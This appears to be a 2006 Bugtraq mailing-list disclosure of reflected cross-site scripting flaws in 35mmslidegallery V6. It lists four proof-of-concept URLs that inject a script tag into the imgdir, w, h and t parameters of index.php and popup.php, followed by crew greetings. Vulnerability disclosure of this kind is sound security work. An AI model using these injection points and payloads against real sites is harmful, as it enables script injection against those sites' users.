[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
multiple Xss exploits in 35mmslidegallery V6
- To: bugtraq@xxxxxxxxxxxxxxxxx, bugtraq-owner@xxxxxxxxxxxxxxxxx, bugtraq@xxxxxxxxxxxx, content@xxxxxxxxxxxxxxx, listadmin@xxxxxxxxxxxxxxxxx, MAILER-DAEMON@xxxxxxxx, MAILER-DAEMON@xxxxxxxxxxxxxxxxxx, postmaster@xxxxxxxxx, root@xxxxxxxxxxxxxxx, str0ke@xxxxxxxxxxx, submit@xxxxxxxxxxx, webmaster@xxxxxxxxxxxxxxxxx
- Subject: multiple Xss exploits in 35mmslidegallery V6
- From: "black code" <black-cod3@xxxxxxxxxxx>
- Date: Tue, 13 Jun 2006 14:09:22 +0300
multiple Xss exploits in 35mmslidegallery V6
forum type : 35mmslidegallery V6
bug found by : black-code
team : $!T3-D0WN
type : Xss
####################################################
exploits :
http://example.com/lumet/album/index.php?imgdir='><script>alert(10)</script>
http://example.comr/lumet/album/popup.php?w='><script>alert(10)</script>
http://example.com/lumet/album/popup.php?h='><script>alert(10)</script>
http://example.com/lumet/album/popup.php?t='><script>alert(10)</script>
####################################################
#######################
emails:
black-cod3@xxxxxxxxxxx & gamr-14@xxxxxxxxxxx & v8f3@xxxxxxxxxxx
#######################
All my respect to our friends , lezr.com , g123g.net
done .. peace
_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE!
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/